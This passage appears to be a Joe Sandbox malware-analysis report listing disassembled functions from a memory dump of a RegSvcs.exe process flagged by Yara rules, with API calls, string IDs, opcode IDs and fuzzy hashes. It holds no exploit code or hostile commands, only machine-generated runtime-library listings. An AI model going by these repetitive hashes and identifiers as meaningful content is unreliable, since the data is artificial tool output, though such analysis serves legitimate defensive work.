                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004032EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy$ExceptionRaise
                                                      • String ID: 0EF$$@$$@
                                                      • API String ID: 2103344913-2852628486
                                                      • Opcode ID: 8adf70b5d305bf464acd20592c93b0a280aa532aff59f374aeea1d5046d9d002
                                                      • Instruction ID: 33c9e7119714e7a37c22dc624428f2d6ddf9f7398783dbb109712563da6ae978
                                                      • Opcode Fuzzy Hash: 8adf70b5d305bf464acd20592c93b0a280aa532aff59f374aeea1d5046d9d002
                                                      • Instruction Fuzzy Hash: ECF0E5B2D1031C67C715EBE5EC0198AB7ACDE15704B50852BFA10B7902FB74B64883A9
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402A7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy
                                                      • String ID: 0*@$0*@$$@
                                                      • API String ID: 2659868963-1365470675
                                                      • Opcode ID: fe13fb0a393673d3aac30e6f5fbe972e5de8e17296f38addbdd5cd554e8ae16e
                                                      • Instruction ID: 97a03de475351f7a2bca72f3d98f058574c121d629282b5af2dbe3d92ee012ff
                                                      • Opcode Fuzzy Hash: fe13fb0a393673d3aac30e6f5fbe972e5de8e17296f38addbdd5cd554e8ae16e
                                                      • Instruction Fuzzy Hash: D2F030B6A00705AB8710DF5AD400986F7ECFF59311315C62BE919D7B10F7B4B868CBA4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                      • Instruction ID: a04617e534a5e6a8668232e222c2b3acc4ffab12b6af52f77dfb0eee37f51b27
                                                      • Opcode Fuzzy Hash: bbdc5413d29c3be440159c633bfa54827fef4cc4fb06d2ce54c7cea705859a06
                                                      • Instruction Fuzzy Hash: B8B136729046459FDB11CF68C8417AFBBE5EF5D300F1491ABE8459B382D6BC8D02CB68
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,?,A99F1BC9,00000000), ref: 00409A99
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409B00
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00409B07
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcVersion
                                                      • String ID:
                                                      • API String ID: 3310240892-0
                                                      • Opcode ID: a503b0e7cc449db335841ad7ab9a773665695323589175055db12fc1e23ed090
                                                      • Instruction ID: bd7fc4279f14078bc3a6410a73fa419a0c5c03756ad06a072f11fca4877197c3
                                                      • Opcode Fuzzy Hash: a503b0e7cc449db335841ad7ab9a773665695323589175055db12fc1e23ed090
                                                      • Instruction Fuzzy Hash: CA515970E042589BDB14EF68DD457DEB774EB45314F5042BAE804A73C2EB389EC08B99
                                                      APIs
                                                      • _free.LIBCMT ref: 0044725E
                                                      • _free.LIBCMT ref: 00447287
                                                      • SetEndOfFile.KERNEL32(00000000,004439ED,00000000,00443C84,?,?,?,?,?,?,?,004439ED,00443C84,00000000), ref: 004472B9
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,004439ED,00443C84,00000000,?,?,?,?,00000000), ref: 004472D5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1547350101-0
                                                      • Opcode ID: d29c09d9e296d4adf2ce22184a14b2fab795c51f593fd17517760519ce477a22
                                                      • Instruction ID: 09b017ae8ededa8dd7b1ea515ad0bf4c2df776c640b9ad3cd90ae46bc27b6ccf
                                                      • Opcode Fuzzy Hash: d29c09d9e296d4adf2ce22184a14b2fab795c51f593fd17517760519ce477a22
                                                      • Instruction Fuzzy Hash: 284126729086009AEB11ABB98C42B9F3765FF48324F24159BF914E73A1DBBCC9024769
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4704e0f1fd3b11a56a9c74060ca5e1b75ea5182f1298efef6483e410a222a90
                                                      • Instruction ID: 03983285e4344cda00197c73dab7651fa2de86250539e33279241a3da3fab7b8
                                                      • Opcode Fuzzy Hash: c4704e0f1fd3b11a56a9c74060ca5e1b75ea5182f1298efef6483e410a222a90
                                                      • Instruction Fuzzy Hash: 7B41D771B00714AFE724EF3ADC41B9BBFA9EB48710F50852FF012DB281D6B9A9418784
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                      • String ID:
                                                      • API String ID: 3264154886-0
                                                      • Opcode ID: 19e2a188049c5894ca11fd6ef1a88c317df4824be80c47bc799430bad589e922
                                                      • Instruction ID: 6d290b131966a57fc63d46ce4638b3526e9ef90feb23ba4a8d0d0e0be83c2de6
                                                      • Opcode Fuzzy Hash: 19e2a188049c5894ca11fd6ef1a88c317df4824be80c47bc799430bad589e922
                                                      • Instruction Fuzzy Hash: 7541BDB1A026119FCB11DF25D944B5ABBE8BF18318F04453EE81AD7790EB39E900CBC5
                                                      APIs
                                                        • Part of subcall function 0042E958: _free.LIBCMT ref: 0042E966
                                                        • Part of subcall function 0043E45F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,004380F7,0000FDE9,8B18EC83,?,?,?,00437E70,0000FDE9,00000000,?), ref: 0043E50B
                                                      • GetLastError.KERNEL32 ref: 0043F01B
                                                      • __dosmaperr.LIBCMT ref: 0043F022
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043F061
                                                      • __dosmaperr.LIBCMT ref: 0043F068
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: 66a6233bd8662e0535dd27a9fe65b24e76e5808839ee4bbdd85bd2a5aa3b6b8f
                                                      • Instruction ID: 5705714bb8414e06a77441d39309be38108af8e058fa10dd69e29da557a8ec21
                                                      • Opcode Fuzzy Hash: 66a6233bd8662e0535dd27a9fe65b24e76e5808839ee4bbdd85bd2a5aa3b6b8f
                                                      • Instruction Fuzzy Hash: 82210871A05609BF9B205F668C80D2B776DEF0C368F10553AF924D7292D739EC4487A9
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                      • _free.LIBCMT ref: 00436E32
                                                      • _free.LIBCMT ref: 00436E68
                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: c572c4aaf3847cb2b4cc91d51ab0c8d7b335412c2af02a72975859a843b434aa
                                                      • Instruction ID: a4166cf88256f44b99565f39f78425332fe0beff0162f420f1608f4976c6b809
                                                      • Opcode Fuzzy Hash: c572c4aaf3847cb2b4cc91d51ab0c8d7b335412c2af02a72975859a843b434aa
                                                      • Instruction Fuzzy Hash: CE11EB752003037A8B1133659C82A2B266A9BD977DF26633FF124962E2ED6DCC05411E
                                                      APIs
                                                      • GetLastError.KERNEL32(00420D37,00420D37,8B18EC83,00431267,00438428,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00436F2C
                                                      • _free.LIBCMT ref: 00436F89
                                                      • _free.LIBCMT ref: 00436FBF
                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00436FCA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free
                                                      • String ID:
                                                      • API String ID: 2283115069-0
                                                      • Opcode ID: cb573d47580b169657372487180f4c216382a616dbdcf0fe4bab6662a542a304
                                                      • Instruction ID: 8e88054898ceb52abecb7deb45702a8fe7e48457730a4ea2a2ff532377063cd4
                                                      • Opcode Fuzzy Hash: cb573d47580b169657372487180f4c216382a616dbdcf0fe4bab6662a542a304
                                                      • Instruction Fuzzy Hash: EF11CA712043027ACB1177666C81E37666A9BC9779F26233FF218D22E2EE6DCC05451E
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00445997,?,?,?,00000020,00000001), ref: 00439EB5
                                                      • GetLastError.KERNEL32(?,00445997,?,?,?,00000020,00000001), ref: 00439EBF
                                                      • __dosmaperr.LIBCMT ref: 00439EC6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2398240785-0
                                                      • Opcode ID: 8cbf9aad02c880dbf15ad90c48f2a92ac3fc3d8c0e0115e1d68da830d2ed5290
                                                      • Instruction ID: f4905dddf45fba5913c4f3bd7f7b993a752e58d3391f1608b586a18716b284c1
                                                      • Opcode Fuzzy Hash: 8cbf9aad02c880dbf15ad90c48f2a92ac3fc3d8c0e0115e1d68da830d2ed5290
                                                      • Instruction Fuzzy Hash: 86F0AD32200101BBCB206FA2CC0998BBF69FF4C7A1B049426F619C3260CB75EC21C7E8
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00445922,?,?,?,?,00000020,00000001), ref: 00439F1E
                                                      • GetLastError.KERNEL32(?,00445922,?,?,?,?,00000020,00000001), ref: 00439F28
                                                      • __dosmaperr.LIBCMT ref: 00439F2F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ErrorFullLastNamePath__dosmaperr
                                                       • String ID:
                                                       • API String ID: 2398240785-0
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000), ref: 00447511
                                                      • GetLastError.KERNEL32(?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?,00000000,?,00438092,8B18EC83), ref: 0044751D
                                                        • Part of subcall function 004474E3: CloseHandle.KERNEL32(FFFFFFFE,0044752D,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?,00000000), ref: 004474F3
                                                      • ___initconout.LIBCMT ref: 0044752D
                                                        • Part of subcall function 004474A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004474D4,00443FCF,00000000,?,00437B46,?,?,00000000,?), ref: 004474B8
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,00443FE2,00000000,00000001,00000000,00000000,?,00437B46,?,?,00000000,?), ref: 00447542
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                       • String ID:
                                                       • API String ID: 2744216297-0
                                                      APIs
                                                      • _free.LIBCMT ref: 00434712
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00434725
                                                      • _free.LIBCMT ref: 00434736
                                                      • _free.LIBCMT ref: 00434747
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: _free$ErrorFreeHeapLast
                                                       • String ID:
                                                       • API String ID: 776569668-0
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 004334FD
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ErrorHandling__start
                                                       • String ID: pow
                                                       • API String ID: 3213639722-2276729525
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID:
                                                       • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                       • API String ID: 0-4009286469
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0042D0F1
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: EncodePointer
                                                       • String ID: MOC$RCC
                                                       • API String ID: 2118026453-2084237596
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: _free
                                                       • String ID: .FC$p"B
                                                       • API String ID: 269201875-2155700466
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004044EB
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040453A
                                                        • Part of subcall function 0042894E: _Yarn.LIBCPMT ref: 0042896D
                                                        • Part of subcall function 0042894E: _Yarn.LIBCPMT ref: 00428991
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                       • String ID: bad locale name
                                                       • API String ID: 1908188788-1405518554
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004288EA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00428945
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                       • String ID: p"B
                                                       • API String ID: 593203224-2496714718
                                                      APIs
                                                      • __Cnd_destroy_in_situ.LIBCPMT ref: 004264EB
                                                      • __Mtx_destroy_in_situ.LIBCPMT ref: 004264F4
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                       • String ID: P7B
                                                       • API String ID: 1432671424-2603120426
                                                      APIs
                                                      • __Cnd_destroy_in_situ.LIBCPMT ref: 00423778
                                                      • __Mtx_destroy_in_situ.LIBCPMT ref: 00423781
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                       • String ID: P7B
                                                       • API String ID: 1432671424-2603120426
                                                      APIs
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004025FE
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ExceptionRaise___std_exception_copy
                                                       • String ID: $@$$@
                                                       • API String ID: 3109751735-431066289
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004026E2
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ___std_exception_copy
                                                       • String ID: $@$$@
                                                       • API String ID: 2659868963-431066289
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402C53
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ___std_exception_copy
                                                       • String ID: $@$$@
                                                       • API String ID: 2659868963-431066289
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00437172,-00000020,00000FA0,00000000,00409EB3,?,0045DBDC,?,00000000), ref: 00438A99
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: CountCriticalInitializeSectionSpin
                                                       • String ID: InitializeCriticalSectionEx$p"B
                                                       • API String ID: 2593887523-3075974992
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00402ACF
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ___std_exception_copy
                                                       • String ID: 0*@$$@
                                                       • API String ID: 2659868963-3718208268
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: Alloc
                                                       • String ID: FlsAlloc$p"B
                                                       • API String ID: 2773662609-2188504205
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040263E
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ___std_exception_copy
                                                       • String ID: $@$$@
                                                       • API String ID: 2659868963-431066289
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040272E
                                                       Memory Dump Source
                                                       • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                       Joe Sandbox IDA Plugin
                                                       • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                       Similarity
                                                       • API ID: ___std_exception_copy
                                                       • String ID: $@$$@
                                                       • API String ID: 2659868963-431066289